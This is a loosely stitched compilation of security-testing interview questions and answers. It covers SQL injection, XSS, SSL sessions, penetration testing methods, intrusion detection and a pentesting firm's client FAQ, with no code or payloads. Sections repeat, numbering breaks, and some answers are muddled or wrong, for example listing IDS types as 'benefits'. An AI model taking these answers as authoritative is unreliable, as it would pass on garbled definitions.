Documente Academic
Documente Profesional
Documente Cultură
Ans. Security testing can be considered most important in all type of software testing. Its main objective
is to find vulnerabilities in any software (web or networking) based application and protect their data
from possible attacks or intruders.
As many applications contains confidential data and needs to be protected being leaked. Software
testing needs to be done periodically on such applications to identify threats and to take immediate
action on them.
Q#2. What is “vulnerability”?
Ans. The vulnerability can be defined as weakness of any system through which intruders or bugs can
attack on the system.
If security testing has not been performed rigorously on the system then chances of vulnerabilities get
increase. Time to time patches or fixes requires preventing a system from the vulnerabilities.
Q#3. What is the intrusion detection?
Ans. Intrusion detection is a system which helps in determining possible attacks and deal with it.
Intrusion detection includes collecting information from many systems and sources, analysis of the
information and find out the possible ways of attack on the system.
Intrusion detection check following:
1. Possible attacks
2. Any abnormal activity
3. Auditing the system data
4. Analysis of different collected data etc.
Q#4. What is “sql injection”?
Ans. Sql injection is one of the common attacking techniques used by hackers to get the critical data.
Hackers check for any loop hole in the system through which they can pass sql queries which by passed
the security checks and return back the critical data. This is known as sql injection. It can allow hackers to
steal the critical data or even crash a system.
Sql injections are very critical and needs to be avoided. Periodic security testing can prevent these kind
of attacks. Sql database security needs to be define correctly and input boxes and special characters
should be handled properly.
Q#5. List the attributes of security testing?
Ans. There are following seven attributes of security testing:
1. Authentication
2. Authorization
3. Confidentiality
4. Availability
5. Integrity
6. Non-repudiation
7. Resilience
Q#6. What is xss or cross site scripting?
Ans. Xss or cross site scripting is type of vulnerability that hackers used to attack web applications.
It allows hackers to inject html or javascript code into a web page which can steal the confidential
information from the cookies and returns to the hackers. It is one of the most critical and common
technique which needs to be prevented.
Q#7. What is ssl connection and an ssl session?
Ans. Ssl or secured socket layer connection is a transient peer-to-peer communications link where each
connection is associated with one ssl session.
Ssl session can be defines as association between client and server generally crated by handshake
protocol. There are set of parameters are defined and it may be share by multiple ssl connections.
Q#8. What is “penetration testing”?
Ans. Penetration testing is on the security testing which helps in identifying vulnerabilities in a system.
Penetration test is an attempt to evaluate the security of a system by manual or automated techniques
and if any vulnerability found testers uses that vulnerability to get deeper access to the system and
found more vulnerabilities. The main purpose of this testing to prevent a system from any possible
attacks.
Penetration testing can be done by two ways –white box testing and black box testing.
In white box testing all the information is available with the testers whereas in black box testing testers
don’t have any information and they test the system in real world scenario to find out the vulnerabilities.
Q#9. Why “penetration testing” is important?
Ans. Penetration testing is important because-
1. Security breaches and loop holes in the systems can be very costly as threat of attack is always
possible and hackers can steal the important data or even crash the system.
2. It is impossible to protect all the information all the time. Hackers always come with new
techniques to steal the important data and its necessary for testers as well to perform the
testing periodically to detect the possible attacks.
3. Penetration testing identifies and protects a system by above mentioned attacks and helps
organizations to keep their data safe.
Q#10. Name the two common techniques used to protect a password file?
Ans. Two common techniques to protect a password file are- hashed passwords and a salt value or
password file access control.
Q#11. List the full names of abbreviations related to software security?
Ans. Abbreviations related to software security are:
1. Ipsec – internet protocol security is a suite of protocols for securing internet
2. Osi – open systems interconnection
3. Isdn integrated services digital network
4. Gosip- government open systems interconnection profile
5. Ftp – file transfer protocol
6. Dba – dynamic bandwidth allocation
7. Dds – digital data system
8. Des – data -encryption standard
9. Chap – challenge handshake authentication protocol
10. Bonding – bandwidth on demand interoperability group
11. Ssh – the secure shell
12. Cops common open policy service
13. Isakmp – internet security association and key management protocol
14. Usm – user-based security model
15. Tls – the transport layer security
Q#12. What is iso 17799?
Ans. Iso/iec 17799 is originally published in uk and defines best practices for information security
management. It has guidelines for all organizations small or big for information security.
Q#13. List down some factors that can cause vulnerabilities?
Ans. Factors causing vulnerabilities are:
1. Design flaws – if there are loop holes in the system that can allow hackers to attack the system
easily.
2. Passwords – if passwords are known to hackers they can get the information very easily.
Password policy should be followed rigorously to minimize the risk of password steal.
3. Complexity – complex software can open the doors on vulnerabilities.
4. Human error – human error is a significant source of security vulnerabilities.
5. Management – poor management of the data can lead to the vulnerabilities in the system.
1. Q#14. List the various methodologies in security testing?
White Box- All the information are provided to the testers.
2. Black Box- No information is provided to the testers and they can test the system in real world
scenario.
3. Grey Box- Partial information is with the testers and rest they have to rest on their own.
Q#15. List down the seven main types of security testing as per Open Source Security Testing
methodology manual?
Ans. The seven main types of security testing as per Open Source Security Testing methodology manual
are:
1. Vulnerability Scanning: Automated software scans a system against known vulnerabilities.
2. Security Scanning:Manual or automated technique to identify network and system weaknesses.
3. Penetration testing: Penetration testing is on the security testing which helps in identifying
vulnerabilities in a system.
4. Risk Assessment: It involves analysis of possible risk in the system. Risks are classified as Low,
Medium and High.
5. Security Auditing:Complete inspection of systems and applications to detect vulnerabilities.
6. Ethical hacking:Hacking done on a system to detect flaws in it rather than personal benefits.
7. Posture Assessment:This combines Security scanning, Ethical Hacking and Risk Assessments to
show an overall security posture of an organization.
Q#16. What is SOAP and WSDL?
Ans. SOAP or Simple Object Access Protocol is a XML-based protocol through which applications
exchange information over HTTP. XML requests are send by web services in SOAP format then a SOAP
client sends a SOAP message to the server. The server responds back again with a SOAP message along
with the requested service.
Web Services Description Language (WSDL): is an XML formatted language used by UDDI. “Web Services
Description Language describes Web services and how to access them”.
Q#17. List the parameters that define an SSL session connection?
Ans. The parameters that define an SSL session connection are:
1. Server and client random
2. Server write MACsecret
3. Client write MACsecret
4. Server write key
5. Client write key
6. Initialization vectors
7. Sequence numbers
Q#18. What is file enumeration?
Ans. This kind of attack uses the forceful browsing with the URL manipulation attack. Hackers can
manipulate the parameters in url string and can get the critical data which generally not open for public
such as achieved data, old version or data which in under development.
Q#19. List the benefits that can be provided by an intrusion detection system?
Ans. There are three benefits of an intrusion detection system.
1. NIDS or Network Intrusion Detection
2. NNIDS or Network Node Intrusion detection system
3. HIDS or Host Intrusion Detection System
Q#20. What is HIDS?
Ans. HIDS or Host Intrusion Detection system is a system in which snapshot of the existing system is
taken and compares with the previous snap shot. It checks if critical files were modified or deleted then
a alert is generated and send to the administrator.
Q#21. List down the principal categories of SET participants?
Ans. Following are the participants:
1. Cardholder
2. Merchant
3. Issuer
4. Acquirer
5. Payment gateway
6. Certification authority
Q#22. Explain “URL manipulation”?
Ans. URL manipulation is a type of attack in which hackers manipulate the website URL to get the critical
information. The information is passed in the parameters in the query string via HTTP GET method
between client and server. Hackers can alter the information between these parameters and get the
authentication on the servers and steal the critical data.
In order to avoid this kind of attacks security testing of URL manipulation should be done. Testers
themselves can try to manipulate the URL and check for possible attacks and if found they can prevent
these kinds of attacks.
Q#23. What are the three classes of intruders?
Ans. Following are the three classes of intruders:
1. Masquerader: It can be defined as an individual who is not authorized on the computer but hack
the system's access control and get the access of authenticated user's account.
2. Misfeasor: In this case user is authenticated to use the system resources but he miss uses his
access on the system.
3. Clandestine user It can be defined as an individual who hacks the control system of the system
and bypasses the system security system.
Q#24. List the component used in SSL?
Ans. Secure Sockets Layer protocol or SSL is used to make secure connection between client and
computers. Below are the component used in SSL:
1. SSL Recorded protocol
2. Handshake protocol
3. Change Cipher Spec
4. Encryption algorithms
Q#25. What is port scanning?
Ans. Ports are the point from where information goes in and out of any system. Scanning of the ports to
find out any loop holes in the system are known as Port Scanning. There can be some weak points in the
system to which hackers can attack and get the critical information. These points should be identified
and prevented from any misuse.
For any application security testing is one of the most important types of testing for any application. In
this type of testing tester himself plays the role of attacker and plays around the application to find the
bugs of the system. Security testing is considered one of the most important types of testing among all
types of testing that are available today.
Many applications contain confidential data that may require protection. It must be done periodically in
order to identify the threats so that an immediate action can be taken if an attack is being done.
Attack possibility
The SQL injections are quite critical so must be avoided. They can be avoided by the periodic attack. SQL
databasesecurity must be defined correctly in that input boxes and special characters must be handled
properly.
Authentication
Confidentiality
Authorization
Integrity
Availability
Resilience
Non-repudiation
This testing helps in preventing the system from any possible attack. Testers perform this testing by two
ways either white box testing and black box testing.
In case of white box testing, all information is available with the testers, while in case of black box testing
testers test the system in the real-world environment without any information and find out the
vulnerabilities.
As threats and attacks can be done at any time so loopholes and the security breaches can be
much costly. Hackers cannot only steal the information but also crash the system.
As hackers adopt new ways of hacking every day, so sometimes it may be difficult to protect the
information all the time. So testers must perform the testing period to detect and prevent the
attack.
Penetration testing protects the system from the above-mentioned attacks and helps the
organizations to keep data safe.
Hashed Password
Passwords- If hackers know the password then they can steal the information easily. Password
policy must be followed properly to avoid this risk.
Design flaws- Due to design flaws the system loopholes can allow the hackers to attack system
easily
Human Error- Human errors must be identified as they are the biggest source of vulnerabilities
Management – Poor data management can also lead to many vulnerabilities, so they must be
also identified
Complexity – If complex coding is being used for software then it may also result in a
vulnerability.
White Box: In this type of testing all information is provided to the testers
Black Box Testing: In this type of testing no information is provided to the testers and they test
the application in the real-world scenario
Grey Box Testing: Partial information is provided to the testers rest they have their own
information
Q16). As per OSS Testing methodology manual which of the seven security types exist?
As per Open Source Security Testing methodology manual following seven types of testing may exist:
Vulnerability Scanning: As per this standard automated software must scan a system against any
vulnerability.
Risk Assessment: It involves possible risk analysis of the system that can be classified as low,
medium and high
Security Auditing: The complete system is scanned for any vulnerability
Posture Assessment: It combines ethical hacking, security scanning, and risk assessment to
show an overall security posture of any organization
Penetration Testing: Penetration testing helps the testers in identifying system vulnerabilities.
WSDL or Web Services Description Language is an XML formatted language that is used by UDDI. It
describes the web services and the way in which they can be used and accessed.
Question 13. What Time Investment Do You Estimate For A Penetration Test?
Answer :
The time investment for a penetration test varies from case to case depending on the systems to be
tested and the individual test requirements. Usually, the time needed ranges from a few days to several
weeks. One goal of the preliminary meeting is to get enough information about the systems to be tested
to estimate the optimal length for the penetration test.
Human resources on the customer's side are usually only marginally bound. Most notably, a contact
person for questions during the exploitation phase is required.
Question 14. How Much Information Does Redteam Pentesting Need From Us?
Answer :
The type and amount of information needed varies with the kind of penetration test that is to be
conducted. The two concepts mentioned most often are blackbox and whitebox tests. Unfortunately,
those terms are not defined by a standard and can therefore mean different things, depending on who
you talk to.
RedTeam Pentesting usually recommends a whitebox test. Penetration tests performed as complete
blackbox tests always suffer from the fact that third parties might get involved without their explicit
consent. Providing technical information in a whitebox test scenario before the test starts also allows the
penetration testers to detect security vulnerabilities that are of importance to your company even faster
and more efficiently.
It should always be acted on the assumption that real, serious attackers are able to obtain the necessary
information prior to their attacks, or can procure it in time. A precise determination about what
information is necessary to conduct an efficient test is done individually for every client during a
preliminary meeting.
uestion 15. What Are Blackbox And Whitebox Tests?
Answer :
A blackbox test is normally defined as a test where the penetration testers do not have any more
information than attackers without internal knowledge might have. The idea is to check how deeply
potential attackers can compromise your systems without any kind of internal information or access. All
knowledge has to be gathered with classical reconnaissance (finding as much information as possible
about the target) and enumeration (a deeper look at individual systems).
Despite the requirement of having as little information in the beginning as possible, at least a few
specifications for the test have to be given, lest to unwillingly target uninvolved third parties. This does
not pose a restriction for real attackers, but for every reputable company it should go without saying that
all phases of a penetration test are only performed where explicit consent is given. This is not the case
for third party systems, that would for example be affected by a portscan of a range of systems that
presumably belong to the client the penetration test is conducted for.
In contrast, there is the whitebox test (sometimes also denoted as crystal-box test). In a whitebox test,
the penetration testers already have internal knowledge about the target systems (for example network
plans or a web application's source code) and possibly various access permissions. The latter could be an
unprivileged user account to the company network, as it is available to employees, or login credentials
for a web application like any normal customer would have.
This allows to test to what extent users with access to a system can misuse their permissions.
Additionally, internal information may be provided that is also available to every staff member of
company. This can be information about internal systems like web servers, mail servers, LDAP servers
etc., but also for example organisational structures like employee's responsibilities and positions in the
company. If only selected parts of information are divulged, this kind of test is also often called a graybox
test.
Question 16. Why Should Not Only The Network Perimeter Be Tested, But Also The Internal Network?
Answer :
If your company's network is sufficiently hardened at the perimeter systems and it was not possible to
successfully compromise it during a perimeter test, it still makes sense to additionally conduct an
internal test. Just because the perimeter systems are sufficiently secured, it does not mean that the
same precautions are taken on the internal network. Most of the time, too little security is done on the
internal network, as it is supposedly only accessible by trustworthy persons. Especially in larger
corporations though, not every employee needs the same access permissions.
The intern does not need to have the same access level as the CEO. It is therefore a severe problem if a
security vulnerability appearing in the future that allows access to the internal network eliminates all
safety precautions. If the financial incentive is big enough, it should also be no problem for attackers
(competitors, business rivals) to either bribe one of your staff members or infiltrate your organization
with somebody reporting back to them with all the data that is supposedly well guarded if seen from the
outside.
Question 17. What Types Of Systems Does Redteam Pentesting Test?
Answer :
RedTeam Pentesting tests all kinds of systems. Frequently, the security vulnerabilities that matter the
most are independent from the system's technology, making it possible to successfully test even
previously unknown types of systems. Additionally, it goes with the job of being a penetration tester to
have the ability to quickly adapt to new situations and systems.
Additionally, RedTeam Pentesting's service is not limited to the classic network- or web application
penetration test. Newly developed hardware and other products are also tested, as well as security
concepts only existing as a draft at the time of testing. In some particular cases, a penetration test
conducted in response to the detection of a security incident can help in identifying the vulnerabilities
exploited and in fixing them in a timely manner.
Question 18. Can Any Harm Be Done To Our Productive Systems During The Test?
Answer :
Unlike real attackers, RedTeam Pentesting pays great attention to a customer's production systems, so as
to not interrupt them. We always go to the greatest extent to leave all systems unharmed in a
penetration test. Attacks where the risk of a system failure is especially high are only performed with the
client's explicit consent.
All in all, it is never possible to completely rule out that a production system crashes in a penetration
test. To be able to get hold of someone as fast as possible in such a situation, emergency telephone
numbers are exchanged prior to the test.
Question 19. Are Denial-of-service Attacks Also Tested?
Answer :
Denial-of-service (DoS) attacks are usually only examined if it seems to be possible to put a system's
availability at risk with very small effort. This can for example be a misconfiguration or a program
error (say, if a system crashes when it gets sent an overly long request). Attacks like this will only be
performed after an explicit agreement is provided, to verify if the attack is indeed possible.
On the other hand, attacks that try to saturate the bandwidth a company has at its disposal are
usually not tested, as this is always possible for attackers with sufficient resources and will also affect
third-party systems. Distributed denial-of-service attacks, that usually involve hundreds, if not
thousands, of zombie systems (systems that were compromised and can now be remotely controlled)
cannot be simulated realistically.
Question 20. Does Redteam Pentesting Do Social Engineering?
Answer :
Penetration tests may include social engineering techniques. These techniques are not without
controversy though. More detailed information about the problems occuring with social engineering
and penetration tests is available under exploitation. One safety measure against social engineering
attacks can be trainings for your employees.
Question 21. What Happens To Confidential Data Redteam Pentesting Gathers During The Penetrat
ion Test?
Answer :
RedTeam Pentesting commits itself to absolute secrecy regarding your confidential data. A non-
disclosure agreement (NDA) determining that RedTeam Pentesting treats a client's data as
confidential is already part of every contract. All customer data, including information that is used to
prepare a first quotation, is subject to the same obligation to confidentiality. At the end of a
penetration test, all data and possible storage media is either securily destroyed or handed back to
the client.
Question 22. Are The Results Written Down In A Report?
Answer :
Every client gets a detailed report at the end of a penetration test. A typical report includes a non-
technical executive summary of the results, to give a short and precise overview of the current status,
followed by a more extensive technical explanation for administrators, developers or other technical
staff.
The individual problems enumerated in the report are separated into a detailed description, a risk
analysis and proposed solutions, to directly give suggestions for improvement.
Question 23. What Other Products And Services Does Redteam Pentesting Offer?
Answer :
RedTeam Pentesting specialises in penetration tests and does not offer any other services. In particular,
no products or services are sold after a penetration test, to guarantee independent and objective test
results. The specialisation also ensures that RedTeam Pentesting's employees have a lot of experience
and expert knowledge for conducting penetration tests.
Question 6. If You Were A Site Administrator Looking For Incoming Csrf Attacks, What Would You Look
For?
Answer :
This is a fun one, as it requires them to set some ground rules. Desired answers are things like, “Did we
already implement nonces?”, or, “That depends on whether we already have controls in place…”
Undesired answers are things like checking referrer headers, or wild panic.
Question 7. What’s The Difference Between Http And Html?
Answer :
Obviously the answer is that one is the networking/application protocol and the other is the markup
language, but again, the main thing you’re looking for is for him not to panic.
Question 8. How Does Http Handle State?
Answer :
It does not, of course. Not natively. Good answers are things like “cookies”, but the best answer is that
cookies are a hack to make up for the fact that HTTP doesn’t do it itself.
1. Question 10. What’s The Difference Between Stored And Reflected Xss?
Answer :
Stored is on a static page or pulled from a database and displayed to the user directly. Reflected
comes from the user in the form of a request (usually constructed by an attacker), and then gets run
in the victim’s browser when the results are returned from the site.
2. Question 11. What Are The Common Defenses Against Xss?
Answer :
Input Validation/Output Sanitization, with focus on the latter.